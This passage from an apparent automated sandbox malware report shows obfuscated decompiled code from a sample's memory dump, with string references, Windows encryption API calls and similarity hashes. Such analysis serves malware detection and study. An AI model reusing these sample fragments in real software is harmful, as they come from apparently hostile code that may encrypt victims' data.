				_pop(_t27);
				 *0x4fd228 =  *0x4fd228 + _t137;
				_t28 = _t27;
				 *0x4fff1d = _t28;
				 *((intOrPtr*)(_t147 - 0xc)) = _t28;
				_t29 =  *((intOrPtr*)(_t147 - 0xc));
				 *0x4fd817 =  *0x4fd817 + _t29;
				 *0x4fd943 = _t29;
				_t107 = _t105 - 0xa3d7 + _t29;
				_t31 = _t29;
				 *0x4fff1b = _t31;
				 *0x4fff1d = _t31;
				_t32 = _t31;
				 *((intOrPtr*)(_t147 - 0x20c8)) = _t32;
				E004FD13E = _t99;
				 *((intOrPtr*)(_t147 - 8)) = _t32;
				 *0x4fd1a2 = _t107;
				_t101 =  *0x4fd10e; // 0x1d10
				 *0x4fd15c = _t101;
				_push( *((intOrPtr*)(_t147 - 0x20c8)));
				_t123 = _t119 + 0xcb8515 + _t119 + 0xcb8515 - 0xed7e;
				_push( *((intOrPtr*)(_t147 - 8)));
				_t109 = (_t107 & 0x0000a903) + 0x9b;
				_pop(_t37);
				E004A93CB(0xc4, _t109, _t123, 0xba1359, 1, 0);
				if(_t123 <= 0) {
				}
				_t39 =  *0x4fd673; // 0x0
				 *0x4fff11 =  *0x4fff11 - _t39;
				if(0x188 >= 0x188) {
					_t101 = 0x7e0d;
					_t109 = 0;
				}
				_pop(_t40);
				_t42 = _t40;
				_t111 = (_t109 & 0x000094c9) + 0x9aa846;
				_t43 = _t42;
				_t143 = 0x8d;
				 *((intOrPtr*)(_t147 - 8)) = _t43;
				 *0x4fd22e =  *0x4fd22e - _t111;
				 *0x4fff19 = _t43;
				_t44 =  *((intOrPtr*)(_t147 - 8));
				_push("/");
				_t128 = 0xc60620;
				 *0x4fd026 =  *0x4fd026 - _t44;
				_t74 = _t42 + _t44;
				if(_t44 <= 0x2d || _t74 != 0x3bff) {
					 *((intOrPtr*)(_t147 - 8)) =  *((intOrPtr*)(_t147 - 8)) + _t101;
					_t101 = _t101 - 0x6e61cd;
					if((_t111 & 0x00000085) == 0) {
						 *0x4fff1b = _t44;
					}
					_t128 = _t128 - 0xc33ce8;
					if(_t128 < 0) {
						 *0x4fff1e = _t44;
						 *0x4fff1e = _t44;
						 *0x4fd10c =  *0x4fd10c + _t101;
						goto L12;
					}
				} else {
					L12:
					_t101 = _t101 + _t101 + 0x743c;
					 *0x4fd1a6 = _t111;
					 *0x4feceb =  *0x4feceb - _t143;
				}
				_t144 = _t143 - 0xbd1a84;
				 *0x4fff1d =  *0x4fff1d - _t44;
				_t45 = E004B9B50();
				_t112 = _t144;
				 *((intOrPtr*)(_t147 - 8)) = _t45;
				 *0x4fd214 = _t112;
				 *0x4fff1d = 0xc8;
				_t130 = _t128 - 0xe44a + 0xec2d;
				_t48 =  *((intOrPtr*)(_t147 - 8));
				if(_t48 >= 0x1074) {
				}
				 *0x4fd212 = _t112;
				_t51 = _t48;
				 *0x4fff1d = _t51;
				 *0x4fd41b = _t51;
				 *0x4fda83 = _t51;
				 *((intOrPtr*)(_t147 - 0x20)) = _t51;
				_t146 = _t144 + _t144 - 0xc806;
				 *0x4fd6e3 =  *0x4fd6e3 + _t146;
				 *0x4fff1d = _t51;
				 *0x4fd218 =  *0x4fd218 - _t112;
				 *0x4fd22e = _t146;
				_t54 = _t51;
				if(_t130 + 0xe362 + _t130 + 0xe362 < 0) {
					 *0x4fd587 = _t54;
					 *0x4fdd1b = 0x23290b;
					 *0x4fd166 = _t101;
					_t112 = _t112 - 1;
				}
				 *((intOrPtr*)(_t147 - 8)) = _t54;
				_t55 =  *((intOrPtr*)(_t147 - 8));
				 *0x4fd028 =  *0x4fd028 + _t55;
				_push(_t55);
				_push(0x4c9f96);
				_push(E004B087C);
				return _t55;
			}

0x004c9c5b
0x004c9c5b
0x004c9c61
0x004c9c68
0x004c9c6e
0x004c9c78
0x004c9c7f
0x004c9c87
0x004c9c89
0x004c9c8f
0x004c9c93
0x004c9ca3
0x004c9caa
0x004c9cb3
0x004c9cb8
0x004c9cc1
0x004c9cc9
0x004c9ccf
0x004c9cdb
0x004c9cdf
0x004c9ce0
0x004c9ceb
0x004c9cf0
0x004c9cf1
0x004c9cf7
0x004c9d04
0x004c9d07
0x004c9d25
0x004c9d2c
0x004c9d47
0x004c9d50
0x004c9d55
0x004c9d56
0x004c9d59
0x004c9d68
0x004c9d70
0x004c9d70
0x004c9d74
0x004c9d79
0x004c9d84
0x004c9d96
0x004c9d9c
0x004c9d9c
0x004c9da0
0x004c9da7
0x004c9dbb
0x004c9dc1
0x004c9dc4
0x004c9dd0
0x004c9dd3
0x004c9dda
0x004c9de0
0x004c9de3
0x004c9ded
0x004c9dee
0x004c9df5
0x004c9df9
0x004c9e09
0x004c9e0c
0x004c9e15
0x004c9e20
0x004c9e20
0x004c9e28
0x004c9e31
0x004c9e33
0x004c9e38
0x004c9e54
0x00000000
0x004c9e54
0x004c9e5b
0x004c9e5b
0x004c9e5e
0x004c9e63
0x004c9e70
0x004c9e78
0x004c9e7a
0x004c9e80
0x004c9e86
0x004c9e8b
0x004c9e91
0x004c9e94
0x004c9ea3
0x004c9ead
0x004c9eb2
0x004c9eb9
0x004c9eb9
0x004c9ed6
0x004c9ee6
0x004c9ee7
0x004c9ef1
0x004c9f01
0x004c9f08
0x004c9f0e
0x004c9f13
0x004c9f1a
0x004c9f23
0x004c9f2a
0x004c9f3b
0x004c9f3f
0x004c9f46
0x004c9f59
0x004c9f67
0x004c9f75
0x004c9f75
0x004c9f76
0x004c9f80
0x004c9f83
0x004c9f8a
0x004c9f8b
0x004c9f90
0x004c9f95

Strings

manage-bde.exe, xrefs: 004C9EC1
scavengeui.dll, xrefs: 004C9D87

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID: manage-bde.exe$scavengeui.dll
API String ID: 0-3447185112
Opcode ID: 3cfe54eacb38446317e6207b67bda0ceb1689a5feed1cb41e87d75825f726ad6
Instruction ID: 6ee9a4b5d0a048e0d090fe1bcb91932283799ce1bf467d81b413ce2c98a2d30f
Opcode Fuzzy Hash: 3cfe54eacb38446317e6207b67bda0ceb1689a5feed1cb41e87d75825f726ad6
Instruction Fuzzy Hash: 1671E266E443409FC740DF79FC846E53BB2EB2A324B49817BD948D7362E2780A55C7AC

Uniqueness

Uniqueness Score: -1.00%

Function 004A604F Relevance: 2.6, Strings: 2, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E004A604F() {
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t17;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t30;
				void* _t32;
				void* _t41;
				short _t48;
				unsigned short _t53;
				signed int _t54;
				signed int _t62;
				void* _t67;

				asm("adc eax, 0x4fd1e2");
				_t48 = 0;
				_t14 =  *((intOrPtr*)(_t67 - 8));
				_t19 = _t18 - 0xf40bf;
				if(_t14 > 0x20c6) {
					L5:
					_t62 = _t62 ^ 0x000000ca;
					L6:
					_push(0);
					_push(0);
					 *0x4fd13c = 0;
					_t41 = 0x7baf;
					 *0x4fd1d6 =  *0x4fd1d6 - _t48 + 1;
					_push(0x8003);
					_t16 = _t14;
					if(_t16 < 0) {
						 *0x4fff1e =  *0x4fff1e + _t16;
					}
					 *0x4fdb07 = 0x2664b2;
					if(_t41 <= _t41) {
						L12:
						_t42 = _t41 + 0x83a0;
						goto L13;
					} else {
						_t42 = 0x79a7;
						_t54 = 0x153e;
						if(_t16 < 0x2d) {
							L14:
							_t30 = _t16;
							_push( *((intOrPtr*)(_t67 - 0x14)));
							if((_t54 & 0x007eff49) == 0) {
								 *0x4fd1fa = _t54;
							}
							_t32 = _t30 - _t16 + 0xc0;
							 *((intOrPtr*)(_t67 - 0xc)) = _t16;
							_t17 =  *((intOrPtr*)(_t67 - 0xc));
							if(_t17 < 0x15) {
								if(_t17 >= 0x252d) {
									 *0x4fff12 =  *0x4fff12 + _t32;
								}
								if(_t32 + _t32 < _t32 + _t32) {
									 *((intOrPtr*)(_t67 - 8)) =  *((intOrPtr*)(_t67 - 8)) + _t42 + 0x52d7b8;
								}
							}
							 *0x4fd1da =  *0x4fd1da + _t54 - 0x7d4545;
							_push(E004A61C5);
							goto ( *0x4fdd9f);
						}
						if(0 >= 0x3d) {
							L13:
							_t53 = 0 >> _t42;
							 *0x4fd1f4 = _t53;
							_t54 = _t53;
							goto L14;
						}
						E004FD13E = 0x79a7;
						_t41 = 0;
						goto L12;
					}
				}
				if(_t19 < 0x386d) {
					 *((intOrPtr*)(_t67 - 8)) = _t19;
				}
				if(0x6f02 >= 0) {
					goto L6;
				}
				_t48 = _t48 + _t48 + 0x9eed;
				 *0x4fed67 =  *0x4fed67 + _t62;
				goto L5;
			}

0x004a604f
0x004a6054
0x004a6056
0x004a6059
0x004a6063
0x004a608f
0x004a608f
0x004a6095
0x004a60a0
0x004a60a6
0x004a60ab
0x004a60b9
0x004a60be
0x004a60cb
0x004a60db
0x004a60e0
0x004a60e2
0x004a60e2
0x004a60f5
0x004a6106
0x004a6135
0x004a6135
0x00000000
0x004a6108
0x004a6108
0x004a610c
0x004a6117
0x004a6146
0x004a6146
0x004a6148
0x004a6151
0x004a6153
0x004a6153
0x004a615c
0x004a615f
0x004a616a
0x004a616f
0x004a6175
0x004a6177
0x004a6177
0x004a6181
0x004a6189
0x004a6189
0x004a6181
0x004a619c
0x004a61b4
0x004a61bf
0x004a61bf
0x004a611c
0x004a613a
0x004a613a
0x004a613d
0x004a6144
0x00000000
0x004a6144
0x004a612a
0x004a6133
0x00000000
0x004a6133
0x004a6106
0x004a606c
0x004a606f
0x004a606f
0x004a607e
0x00000000
0x00000000
0x004a6087
0x004a6089
0x00000000

Strings

.2!, xrefs: 004A6110
m8, xrefs: 004A6067

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID: .2!$m8
API String ID: 0-2283709712
Opcode ID: 313c6141b115be0fba61c9dc2e500bd03e01bc23667ed789d2b7bae046d7d4ee
Instruction ID: 853d9a12acc4e4d1c6832a87f7098f462a3f1ac89904cfb3c302138d8d126723
Opcode Fuzzy Hash: 313c6141b115be0fba61c9dc2e500bd03e01bc23667ed789d2b7bae046d7d4ee
Instruction Fuzzy Hash: 8D3136A6E402054BDB05DF39ED602E63BB3EB77314B49823AC84AD3769E63D0856C74C

Uniqueness

Uniqueness Score: -1.00%

Function 004AD9ED Relevance: 2.6, Strings: 2, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E004AD9ED(char __eax, intOrPtr __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t11;
				signed int _t12;
				char _t15;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t23;
				void* _t30;
				void* _t34;
				short _t38;
				void* _t41;
				void* _t44;
				short _t48;
				intOrPtr* _t50;
				void* _t53;
				void* _t66;

				_t30 = __ecx;
				_t23 = __ebx;
				_pop(_t34);
				 *0x4fff19 = __eax;
				 *0x4fd20e = 0x8be7e1;
				_t38 = _t34;
				 *0x4fd1c4 = _t38;
				_t41 = _t38;
				_t11 =  *((intOrPtr*)(_t66 - 8));
				 *((intOrPtr*)(_t41 + 4)) = _t11;
				 *((intOrPtr*)(_t66 - 8)) = _t11;
				_t12 =  *0x4fd84f; // 0x5020000
				 *((intOrPtr*)(_t66 - 0xc)) = __ebx;
				 *0x4fd1e6 = 0;
				_t44 = _t41;
				 *0x4fff1b =  !_t12;
				_t53 = __edi - 0xc6bdf4;
				_push(0x4fec2f);
				_push(0x4fec2f);
				_t15 = E004A52AC(_t53);
				 *0x4fd232 =  *0x4fd232 - 0xa772;
				_t48 = _t44;
				 *0x4fff1d = _t15;
				if(_t53 != 0) {
					L5:
					_t23 = 0x50674c;
					if(_t30 >= _t30) {
						 *0x4fd1ea = _t48;
					}
				} else {
					if(_t53 <= 0) {
						 *0x4fff10 =  *0x4fff10 + _t15;
					}
					 *0x4fd5bb = _t15;
					if(_t23 >= 0x323a) {
						goto L5;
					}
				}
				 *0x4fd20e = 0x8b0b;
				 *((intOrPtr*)(_t66 - 8)) =  *((intOrPtr*)(_t66 - 0x38));
				_t19 =  *((intOrPtr*)(_t66 - 8));
				_t50 = _t48;
				 *_t50 = _t19;
				_push(_t50);
				 *((intOrPtr*)(_t66 - 8)) = _t19;
				_t20 =  *0x4fd83b;
				 *0x4fda93 =  *0x4fda93 + _t20;
				_push(0xc5);
				_push(0xc5);
				_push(E004ADB3F);
				_push(E004A9064);
				return _t20;
			}

0x004ad9ed
0x004ad9ed
0x004ad9f2
0x004ad9f3
0x004ada06
0x004ada10
0x004ada18
0x004ada28
0x004ada29
0x004ada2c
0x004ada2f
0x004ada32
0x004ada39
0x004ada3f
0x004ada50
0x004ada53
0x004ada5f
0x004ada65
0x004ada66
0x004ada68
0x004ada7f
0x004ada88
0x004ada8f
0x004ada97
0x004adabe
0x004adabe
0x004adac7
0x004adad7
0x004adade
0x004ada99
0x004ada9c
0x004ada9e
0x004ada9e
0x004adaa4
0x004adab7
0x00000000
0x004adabc
0x004adab7
0x004adaf9
0x004adb0a
0x004adb12
0x004adb15
0x004adb16
0x004adb1f
0x004adb24
0x004adb27
0x004adb2c
0x004adb32
0x004adb33
0x004adb34
0x004adb39
0x004adb3e

Strings

:2, xrefs: 004ADAB2
user.exe, xrefs: 004ADB0D

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID: :2$user.exe
API String ID: 0-613280821
Opcode ID: 4e504482023708cc0964167eb3d4f24fd07aaadfac9cd8e8d2d6217ccd3ba697
Instruction ID: dd1957cad0203d35f31f32d974e623f4a2c4c9beac6d9c9b14e8a52b99e6076b
Opcode Fuzzy Hash: 4e504482023708cc0964167eb3d4f24fd07aaadfac9cd8e8d2d6217ccd3ba697
Instruction Fuzzy Hash: EF31E169E142419F8B00DF79E9445E97FB2EF7E710300817AD508E7368E2314954C758

Uniqueness

Uniqueness Score: -1.00%

Function 004D23B8 Relevance: 2.6, Strings: 2, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E004D23B8(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _v16;
				intOrPtr _t11;
				char _t13;
				char _t14;
				char* _t28;
				short _t32;
				intOrPtr _t35;
				void* _t41;

				_t41 = __esi;
				_t28 = __ebx - __ecx;
				 *0x4fff15 =  *0x4fff15 - __ecx;
				 *0x4fd15c =  *0x4fd15c + __ecx;
				_t32 =  *0x4fd1aa; // 0x9c76
				if((__edx & 0x007e2a13) >= 0) {
					 *0x4feab3 =  *0x4feab3 - __edx;
					 *0x4fd212 = __edx;
					 *0x4fff1b = 0xbf;
				}
				_t11 =  *0x4fd66f;
				_t35 = 0x85d5;
				if(0x1d0 != 0) {
					L8:
					_t13 = 0;
					goto L9;
				} else {
					_t35 = 0xad41;
					 *0x4fd248 =  *0x4fd248 - _t41;
					 *0x4ff4e7 =  *0x4ff4e7 - _t41;
					_t41 = _t41 + 0xbebe46;
					 *0x4fff1e = _t11 + _t11;
					_t13 = ("CNHI06S.DLL" & 0x00002843) + 0x3025;
					_t28 = "ehshell.dll";
					 *0x4fff14 =  *0x4fff14 + _t28;
					if(_t28 <= _t28) {
						L9:
						_t14 = _t13 + 0x2a;
						 *0x4fff12 =  *0x4fff12 + _t28;
						if(_t28 >= _t28) {
							if(_t28 < _t28) {
								_v16 = _v16 + _t32;
							}
							 *0x4fd14e = _t32;
						}
						 *0x4fd1e8 = _t35 - 0x8009;
					} else {
						if(_t32 != _t32) {
							_t32 = _t32 + 0x71;
							_v16 = _v16 - _t32;
							_t35 =  *0x4fd1ca; // 0x44
							 *0x4feb07 =  *0x4feb07 - _t35;
							 *0x4fff18 =  *0x4fff18 + _t35;
						}
						_t41 = 0x4fd264;
						if(0x4fd264 <= 0) {
							 *0x4fff1d = _t13;
							 *0x4fd006 =  *0x4fd006 - 0xf9;
							goto L8;
						}
					}
				}
				 *0x4fff1b = _t14;
				return _t14;
			}

0x004d23b8
0x004d23be
0x004d23c1
0x004d23c7
0x004d23d0
0x004d23dd
0x004d23df
0x004d23e5
0x004d23f4
0x004d2402
0x004d2407
0x004d240c
0x004d2416
0x004d24b6
0x004d24b9
0x00000000
0x004d241f
0x004d2426
0x004d242a
0x004d2431
0x004d2439
0x004d243f
0x004d2455
0x004d2459
0x004d245e
0x004d2467
0x004d24bc
0x004d24bc
0x004d24be
0x004d24c6
0x004d24ca
0x004d24d1
0x004d24d1
0x004d24d4
0x004d24d4
0x004d24e7
0x004d2469
0x004d246c
0x004d246e
0x004d2471
0x004d247a
0x004d2481
0x004d2487
0x004d2487
0x004d248f
0x004d2498
0x004d249a
0x004d24af
0x00000000
0x004d24af
0x004d2498
0x004d2467
0x004d24fd
0x004d2504

Strings

ehshell.dll, xrefs: 004D2459
CNHI06S.DLL, xrefs: 004D244B

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID: CNHI06S.DLL$ehshell.dll
API String ID: 0-1008100336
Opcode ID: 5c988fa36115cbf1bd51d00893a444b28407df9656a153e7d617b195a444598a
Instruction ID: a6497d25d2a0f822da9073a3b588576045bfdcd1f78268a422c81c1d8013d38d
Opcode Fuzzy Hash: 5c988fa36115cbf1bd51d00893a444b28407df9656a153e7d617b195a444598a
Instruction Fuzzy Hash: AD31A56AD182818BC700EF75FD651F23772EF7631074841BBC98487736E2690665C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 004B9A3F Relevance: 1.5, APIs: 1, Instructions: 45encryptionCOMMON

Download Yara Rule

APIs

CryptEncrypt.ADVAPI32(?,00000000,00000001,?,?,?,?), ref: 004B9A5F

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: CryptEncrypt
String ID:
API String ID: 1352496322-0
Opcode ID: 4924ed987e786c5a9e72aa8be46b1d5536c14e2061132af2a9fdfeaa39f2ca0d
Instruction ID: 5c7cfe8761e865e39ddb022798b1e5a3a69690086e283bed693011361a52d348
Opcode Fuzzy Hash: 4924ed987e786c5a9e72aa8be46b1d5536c14e2061132af2a9fdfeaa39f2ca0d
Instruction Fuzzy Hash: 23116A7590021EAFDF01CFD0DD85AEEBBB5FB48304F104059EA00B2260D37A9965EB64

Uniqueness

Uniqueness Score: -1.00%

Function 004B9C88 Relevance: 1.5, APIs: 1, Instructions: 23
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004B9C88(BYTE* _a4, int _a8) {
				char _v8;
				DWORD* _v12;
				char* _v20;
				int _t10;

				_v20 = 0;
				_v12 =  &_v8;
				_t10 = CryptBinaryToStringA(_a4, _a8, 1, 0, _v12);
				if(_t10 == 0) {
					return _v20;
				} else {
					_push(_v8);
					_push(E004B9CCB);
					_push(E0049D84B);
					return _t10;
				}
			}

0x004b9c8e
0x004b9c98
0x004b9caf
0x004b9cb7
0x004b9d48
0x004b9cbd
0x004b9cbd
0x004b9cc0
0x004b9cc5
0x004b9cca
0x004b9cca

APIs

CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 004B9CAF

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 1d991ae3ae643c0b73f88465f1a63c60bdf109cdf8b05baef7b80d3e8e90e516
Instruction ID: 164e663a4651eb68bcd905890fd9402878932acb83e3ca1015a20a8a5efd985f
Opcode Fuzzy Hash: 1d991ae3ae643c0b73f88465f1a63c60bdf109cdf8b05baef7b80d3e8e90e516
Instruction Fuzzy Hash: 34E09235A00108BBDF00CF94CD45FDE7FB9BB40704F100161B514A62D0D3B59A50DB94

Uniqueness

Uniqueness Score: -1.00%

Function 004A2015 Relevance: 1.3, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004A2015(void* __ebx, void* __ecx, void* __edi) {
				void* _v12;
				signed int _t9;
				signed int _t10;
				intOrPtr _t17;
				signed char _t18;
				short _t35;
				signed char _t38;

				 *0x4ff97c =  *0x4ff97c + 0x4fd260;
				 *0x4fff1d = 0xd0;
				_t9 =  *0x4fff1e; // 0x3
				_t10 = _t9 | 0x00000008;
				 *0x4fd55b = _t10;
				if(_t10 <= 0x23d32d) {
				}
				_t35 =  *0x4fd196; // 0x0
				 *0x4fd1e2 = _t35;
				if(0 > 0x11) {
					 *0x4fff11 =  *0x4fff11;
					 *0x4fd99b = 0;
				}
				_t38 =  *0x4fd19c; // 0x9695
				_t17 =  *0x4fd5db; // 0x1
				_t18 = _t17 - 0x187e46;
				if((_t38 & 0x0000008c) >= 0) {
					 *0x4fff19 =  *0x4fff19 + _t18;
					if((_t18 & 0x000000bc) > 0) {
						_t18 = 0xdc;
						 *0x4fff1e = 0xdc;
						goto L7;
					}
				}
				 *0x4fd040 =  *0x4fd040 - _t18;
				return 0;
			}

0x004a202b
0x004a2031
0x004a2038
0x004a203e
0x004a2041
0x004a204d
0x004a204d
0x004a205b
0x004a2062
0x004a2074
0x004a2076
0x004a207c
0x004a2083
0x004a20a0
0x004a20aa
0x004a20af
0x004a20b7
0x004a20c2
0x004a20cb
0x004a20d1
0x004a20d3
0x00000000
0x004a20d3
0x004a20cb
0x004a20e0
0x004a20ed

Strings

i, xrefs: 004A2086

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID: i
API String ID: 0-701693142
Opcode ID: 3238d351552786d764ddb67df22f0b1315b60747891c0e12085bd1f432c76521
Instruction ID: 52582c381cf50fb1c87c3133c39bfe95693ab7471b4dbbfd03cbf39ee39a8e2e
Opcode Fuzzy Hash: 3238d351552786d764ddb67df22f0b1315b60747891c0e12085bd1f432c76521
Instruction Fuzzy Hash: 4911E65AA182414BC700DF7DED453E53BB3D72B22474002BBC564D37AAD364862BCB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004A06C7 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E004A06C7() {
				char _t10;
				intOrPtr _t14;
				short _t30;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t36;

				 *0x4fff1b = 0xc8;
				_pop(_t10);
				 *0x4fd323 = _t10;
				 *0x4fff11 =  *0x4fff11 + _t10;
				 *((intOrPtr*)(_t36 - 8)) =  *((intOrPtr*)(_t36 - 8)) + _t30;
				 *0x4fd132 = _t30;
				 *((intOrPtr*)(_t36 - 8)) = _t10;
				E0049DAF1(_t10, 0x40889c, 0x7742, _t33, _t34, _t35, _t33, 1, _t33);
				_t14 =  *((intOrPtr*)(_t36 - 8));
				 *((intOrPtr*)(_t36 - 0x2c)) = _t14;
				_push(_t14);
				 *0x4fda8f =  *0x4fda8f - 0x18a3da;
				 *0x4fdbb3 =  *0x4fdbb3 + 0x18a3da;
				_push(0);
				_push(0);
				_push(E004A075F);
				goto __ebx;
			}

0x004a06c9
0x004a06d7
0x004a06d8
0x004a06e5
0x004a06f5
0x004a06f8
0x004a0709
0x004a0710
0x004a0729
0x004a072a
0x004a0736
0x004a0740
0x004a0746
0x004a074f
0x004a0751
0x004a0753
0x004a075d

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e285082ceb6f121e1d68d391ce4ba79a9e96fb588384655a16ee25fd2e9b4372
Instruction ID: b513a531643d37f81cd8c437d00576a82d4a5fd88118408304106b95ea5d2c49
Opcode Fuzzy Hash: e285082ceb6f121e1d68d391ce4ba79a9e96fb588384655a16ee25fd2e9b4372
Instruction Fuzzy Hash: E4012C71F84300AFD740EFA8ADD1BE93BE1EB19310F14407AA948E7351E2B45965DB29

Uniqueness

Uniqueness Score: -1.00%

Function 004B9952 Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E004B9952(intOrPtr* _a12, intOrPtr* _a16) {
				char _v8;
				intOrPtr _v32;
				intOrPtr _v36;
				char* _v40;
				intOrPtr _v52;

				_v52 = 0;
				_v36 =  *_a16;
				_v32 =  *_a12;
				if(_v36 != 0) {
					_push(0xf0000000);
					_push(1);
					_push(0);
					_push(0);
					_v40 =  &_v8;
					_push(_v40);
					_push(E004B99AA);
					goto ( *0x4fde17);
				}
				_v52 = 1;
				return _v52;
			}

0x004b9958
0x004b9966
0x004b9970
0x004b9977
0x004b9985
0x004b998a
0x004b998c
0x004b998e
0x004b9993
0x004b9996
0x004b9999
0x004b99a4
0x004b99a4
0x004b9979
0x004b9af2

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb84a39d97ddd0bb3157e04ea1c6f0dfd333180e26c82c12b6db0712d7f00b71
Instruction ID: 10fa202c10085713d56967cec80cd5a5ce91cba14caf33b733b7f36413db3e7f
Opcode Fuzzy Hash: fb84a39d97ddd0bb3157e04ea1c6f0dfd333180e26c82c12b6db0712d7f00b71
Instruction Fuzzy Hash: 2BF0F470A14208DFDB00CF84DC81BDEB7B1BB0C704F200169EA01AB390D3B5AD20CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004B99AA Relevance: .0, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E004B99AA(void* __eax) {
				void* _t14;

				if(__eax != 0) {
					 *((intOrPtr*)(_t14 - 0x24)) = _t14 - 8;
					_push( *((intOrPtr*)(_t14 - 0x24)));
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t14 + 0xc)));
					_push( *((intOrPtr*)(_t14 + 8)));
					_push( *((intOrPtr*)(_t14 - 4)));
					_push(E004B99DB);
					goto ( *0x4fe21f);
				}
				return  *((intOrPtr*)(_t14 - 0x30));
			}

0x004b99ac
0x004b99b5
0x004b99b8
0x004b99bd
0x004b99c0
0x004b99c1
0x004b99c4
0x004b99c7
0x004b99ca
0x004b99d5
0x004b99d5
0x004b9af2

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f02f8e37c9a03f80696217c5ace41aa9f7e4126c74ba951595c568f54458e44
Instruction ID: c26da3c286402a094b2c6d1d0f5a36ff364d654529714570f44fafe4375f8c01
Opcode Fuzzy Hash: 6f02f8e37c9a03f80696217c5ace41aa9f7e4126c74ba951595c568f54458e44
Instruction Fuzzy Hash: 67E0B675A10049FE9F05CF91DD45DEE7BB5FB98300B2140A6EA11A6260D7769F20EB24

Uniqueness

Uniqueness Score: -1.00%

Function 004D3C6F Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a1b554c8c287d043c9a9845ddc62ba054aeae72260a33f75fb59abc483118ee
Instruction ID: a87b6c673bf707a0c788cdca955f6ed48f849a5cb7178f2140cdf1450d363194
Opcode Fuzzy Hash: 2a1b554c8c287d043c9a9845ddc62ba054aeae72260a33f75fb59abc483118ee
Instruction Fuzzy Hash: B9D0A76177560117DD10B9388C96BD132C7C3E0B18F504522B999E77CBD0C79502419A

Uniqueness

Uniqueness Score: -1.00%

Function 0047953C Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34c5dd27b20e86b37aeb1191811319d5320967c83668f37be2138979cce90555
Instruction ID: 8c1966e6ae9ecceaba1b2e376c290be9cc37569eba9f22713e19fda7bac884c3
Opcode Fuzzy Hash: 34c5dd27b20e86b37aeb1191811319d5320967c83668f37be2138979cce90555
Instruction Fuzzy Hash: 71D0C9B5B84604ABE300DE89ECC1FA5B6A9E71CB85F104076AA5897251D2B55C108B6D

Uniqueness

Uniqueness Score: -1.00%

